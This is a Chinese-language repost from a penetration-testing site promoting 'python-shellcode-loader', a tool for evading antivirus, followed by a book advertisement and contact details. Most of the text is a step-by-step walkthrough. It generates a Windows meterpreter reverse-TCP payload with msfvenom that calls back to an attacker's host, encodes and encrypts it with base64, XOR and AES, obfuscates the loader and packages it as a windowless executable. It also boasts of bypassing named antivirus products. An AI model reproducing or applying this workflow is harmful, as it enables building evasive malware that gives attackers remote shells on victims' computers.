1. 首页
  2. 下载

Python免杀shellcode加载器 — python-shellcode-loader​

【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。

项目作者:HZzz2
项目地址:https://github.com/HZzz2/python-shellcode-loader


一、工具介绍
免杀方式 msfvenom生成raw格式的shellcode–>base64–>XOR–>AES
将python代码缩小并混淆最后生成exe
目前过DF、360和火绒 virustotal:7/66过卡巴斯基、迈克菲等

二、安装与使用
1、获取项目
git clone https://github.com/HZzz2/python-shellcode-loader.gitcd python-shellcode-loaderpip install -r .requirements.txt

2、生成shellcode

#生成shellcodemsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=9999 -f raw > rev.raw

3、base64编码shellcode并替换jiami.py中的值

#base64base64 -w 0 -i rev.raw > rev.bs64cat rev.bs64复制base64的值替换jiami.py中payload 也就是 第二十四行 sc='payload'
4、加密base64并替换main.py中的值
#加密base64后的shellcodepython3 jiami.py#会生成一个aes-xor.txt的文件,复制文件里的值(经过XOR和AES加密后)复制的值替换main.py中的payload 也就是第四十一行 jiami_sc='payload'
5、缩小和混淆py代码
缩小python代码pyminify main.py --output main-mini.py
混淆main-mini.py中的python代码https://pyob.oxyry.com/ 在线混淆

将混淆后的代码保存到一个文件中,比如文件名为:main-mini-ob.py

6、打包成可执行文件exe
#打包成exepyinstaller.exe -Fw -i .setting.ico --key=leslie .main-mini-ob.py-F 打包为单文件 -w 不显示窗口 -i ico图标文件 --key 加密字节码的密钥等待打包完成。。。。打包好后的可执行程序在dist目录中

7、检验图

三、下载地址:
1、通过项目地址下载
2、关注web安全工具库公众号,后台回复:20220723

四、声明:

仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者不承担任何法律及连带责任。


推荐书籍

加我微信:ivu123ivu,进送书活动群,不定时免费送书


《Node.js Web全栈开发实战》

本书主要介绍了Node.js在Web全栈开发领域的应用实践,分别从Node.js基础语法、模块化、服务器搭建、Express框架等方面由浅入深地进行讲解。在企业级应用开发方面也有着重讲解,例如MongoDB数据库的操作、Ajax异步请求与同源策略、Node.js会话跟踪技术的应用、Node.js爬虫程序的实现等。在企业开发中,Node.js的应用越来越广泛。像Yahoo、Microsoft等公司的很多应用都已经迁移到Node.js了,国内的阿里巴巴、网易、腾讯、新浪、百度等公司的很多线上产品也纷纷改用Node.js开发,并取得了很好的效果。

原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/6398.html

联系我们

400-800-8888

在线咨询:点击这里给我发消息

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息